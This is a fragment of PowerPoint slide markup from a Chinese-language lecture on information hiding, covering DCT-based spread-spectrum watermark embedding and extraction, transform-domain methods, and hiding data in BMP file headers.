              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系数矩阵的左上角</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>高频系数分布在右下角</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>低频</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绝对值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>大于高频系数的绝对值。图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也说明了这一点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3 . 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的光谱表示中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>左上角是红色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>低频</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>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6252544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基于扩频思想的数字水印算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>思考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水印是嵌入在能量最大的前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DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系数，水印嵌入过程可能会导致系数大小发生变化，那么接收端如何得知，应该由哪些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系数提取水印呢？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待检测载体是否包含水印，是将提取结果与水印相关，根据相关值进行判决。那么判决阈值如何设定？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3129766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基于扩频思想的数字水印算法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-36512" y="1628800"/>
            <a:ext cx="9721080" cy="4608512"/>
            <a:chOff x="-36512" y="1628800"/>
            <a:chExt cx="9721080" cy="4608512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="53" name="肘形连接符 52"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="51" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="8633043" y="1998132"/>
              <a:ext cx="194578" cy="879941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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-36512" y="1628800"/>
              <a:ext cx="9721080" cy="4608512"/>
              <a:chOff x="-36512" y="1628800"/>
              <a:chExt cx="9721080" cy="460851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36512" y="233643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1760" y="233643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4288" y="225513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233643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" name="肘形连接符 14"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="7" idx="3"/>
                <a:endCxn id="8" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1432243" y="2959373"/>
                <a:ext cx="979517" cy="12700"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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18" name="肘形连接符 17"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="8" idx="3"/>
                <a:endCxn id="10" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3880515" y="2959373"/>
                <a:ext cx="979517" cy="12700"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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21" name="肘形连接符 20"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="10" idx="3"/>
                <a:endCxn id="9" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="6328787" y="2878073"/>
                <a:ext cx="835501" cy="81300"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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1331640" y="2636912"/>
                <a:ext cx="17138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DCT(DFT</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>DWT)</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN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794210" y="2648907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关键系数</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN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164288" y="5867980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原始水印</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" alt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156176" y="3502749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恢复水印</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" alt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0" y="5867980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原始载体</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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901" y="458112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3165" y="458112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403648" y="4869160"/>
                <a:ext cx="17138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DCT(DFT</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>,</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>DWT)</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="17" name="肘形连接符 16"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="22" idx="3"/>
                <a:endCxn id="30" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1475656" y="5204063"/>
                <a:ext cx="907509" cy="12700"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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0019" y="4559394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2411760" y="3851756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关键系数位置</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="肘形连接符 39"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="37" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3851920" y="5182329"/>
                <a:ext cx="978099" cy="21734"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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42" name="肘形连接符 41"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="30" idx="0"/>
                <a:endCxn id="8" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="2632430" y="4067421"/>
                <a:ext cx="998820" cy="28595"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3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43" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3662631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水印载体</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp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7823" y="4593828"/>
                <a:ext cx="1468755" cy="1245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6" name="肘形连接符 45"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="37" idx="3"/>
                <a:endCxn id="9" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="6298774" y="2878073"/>
                <a:ext cx="865514" cy="2304256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50" name="TextBox 49"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3715053" y="4841081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关键系数</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" alt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970674" y="1628800"/>
                <a:ext cx="171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判决结果</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="56" name="肘形连接符 55"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="45" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="8626578" y="1998132"/>
                <a:ext cx="201043" cy="3218631"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2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57" name="TextBox 56"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7380312" y="3645024"/>
                <a:ext cx="17138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根据提取</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>所得水印与原始</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>水印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相关性判决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11003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基于扩频思想的数字水印算法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水印提取过程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对接收到载体（待判决，可能含有水印，也可能没有）做</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>DCT</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>变换，根据原始载体确定水印位置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根据嵌入位置系数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提取水印</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>，如下式：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box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𝑖</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" altLang="zh-CN" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>=1⋯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考察嵌入水印与提取水印的相关系数，若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大于阈值</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>，则认为带检测载体包含水印。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𝜏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nary>
                          </m:e>
                        </m:rad>
                      </m:den>
                    </m:f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=1⋯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zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr lvl="2"/>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr lvl="2"/>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math"/>
                </a:endParaRPr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53291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变换域算法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基于扩频思想的数字水印的一般模型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水印不仅可以嵌入到</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>DCT</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>系数上，也可嵌入到离散小波、离散傅立叶等等变换系数之上。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嵌入是通过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修改系数</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>实现的，系数修改方式可使用下列任一表达式：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1+</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="zh-CN" altLang="en-US" i="1">
                            <a:latin typeface="Cambria Math"/>
                          </a:rPr>
                          <m:t>𝛼</m:t>
                        </m:r>
                        <m:r>
                          <a:rPr lang="en-US" altLang="zh-CN" i="1">
                            <a:latin typeface="Cambria Math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=1⋯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zh-CN" altLang="en-US" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>𝛼</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" altLang="zh-CN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=1⋯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zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math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</a:rPr>
                      <m:t>=1⋯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zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>水印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非盲提取</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                  <a:ea typeface="Cambria Math"/>
                </a:endParaRPr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481" r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9246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BMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>图像文件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>
          <a:xfrm>
            <a:off x="1259632" y="1844824"/>
            <a:ext cx="7626350" cy="434340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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>秘密数据必须保存到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位图文件的两个有效数据结构之间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>位图图像的结尾</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件头数据与图像数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>隐藏在文件尾部需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修改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文件头中文件长度域</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>隐藏在文件头与图像数据之间，需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件长度、数据起始偏移地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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845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606" name="Group 9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394952"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1071563" y="1785938"/>
          <a:ext cx="7313612" cy="4581525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2037873"/>
                <a:gridCol w="2458135"/>
                <a:gridCol w="2817604"/>
              </a:tblGrid>
              <a:tr h="5181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水印位置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23" marR="76123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嵌入算法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提取算法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8707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所有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中频系数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固定位置的中频系数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随机挑选中频系数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选择最大的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个中频系数</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="76123" marR="76123"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96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0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76123" marR="76123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70" name="Object 60"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6072188" y="2428875"/>
          <a:ext cx="19208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2" name="Equation" r:id="rId4" imgW="1409088" imgH="393529" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId4" imgW="1409088" imgH="393529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2428875"/>
                        <a:ext cx="1920875" cy="5365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357563" y="2493963"/>
          <a:ext cx="213836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3" name="Equation" r:id="rId6" imgW="1346200" imgH="228600" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId6" imgW="1346200" imgH="22860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2493963"/>
                        <a:ext cx="2138362" cy="3635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6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143250" y="3786188"/>
          <a:ext cx="23622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4" name="Equation" r:id="rId8" imgW="1511300" imgH="228600" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId8" imgW="1511300" imgH="22860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3786188"/>
                        <a:ext cx="2362200" cy="3571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7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061075" y="3649663"/>
          <a:ext cx="17256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5" name="Equation" r:id="rId10" imgW="901309" imgH="444307" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId10" imgW="901309" imgH="444307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075" y="3649663"/>
                        <a:ext cx="1725613" cy="850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77"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3357563" y="5214938"/>
          <a:ext cx="21431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6" name="Equation" r:id="rId12" imgW="1244600" imgH="228600" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId12" imgW="1244600" imgH="228600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14938"/>
                        <a:ext cx="2143125" cy="3921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8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6108700" y="4941888"/>
          <a:ext cx="160178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7" name="Equation" r:id="rId14" imgW="1041400" imgH="596900" progId="Equation.DSMT4">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId14" imgW="1041400" imgH="596900" progId="Equation.DSMT4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4941888"/>
                        <a:ext cx="1601788" cy="9159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93"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="714375"/>
            <a:ext cx="7920037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dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>变换域算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1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0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0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006666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="006666"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 变换域算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1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方法一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每个系数上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嵌入的强度相同</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>嵌入强度一定时，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若系数幅值较大，嵌入信息易受破坏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若系数幅值较小，嵌入对系数修改大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法二、三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根据系数的大小，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成比例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地嵌入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这三个算法的提取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>需要原始图像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bldLvl="5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小结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357313" y="1785938"/>
            <a:ext cx="7313612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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>变换域隐藏的总体思想，就是将秘密信息隐藏在载体的最重要部位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/>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>变换、小波变换、傅氏变换等，都是能量守恒变换，在变换域中将能量集中，隐藏时将秘密信息与载体的视觉重要部分紧密联系在一起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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文件格式信息隐藏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例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9220" name="Picture 4" descr="Le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Le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3810000"/>
            <a:ext cx="6629400" cy="2438400"/>
            <a:chOff x="-3" y="-3"/>
            <a:chExt cx="3503" cy="1926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9226" name="Group 7"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3497" cy="1920"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="3497" cy="1920"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9228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885" cy="384"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="885" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9271" name="Rectangle 9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99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比较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72" name="Rectangle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8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29" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="885" y="0"/>
                <a:ext cx="1222" cy="384"/>
                <a:chOff x="885" y="0"/>
                <a:chExt cx="1222" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9269" name="Rectangle 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="928" y="0"/>
                  <a:ext cx="1136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 dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>隐写前</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="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9270" name="Rectangle 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="885" y="0"/>
                  <a:ext cx="122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0" name="Group 14"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2107" y="0"/>
                <a:ext cx="1390" cy="384"/>
                <a:chOff x="2107" y="0"/>
                <a:chExt cx="1390" cy="384"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9267" name="Rectangle 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2150" y="0"/>
                  <a:ext cx="130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 dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>隐写后</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="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9268" name="Rectangle 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
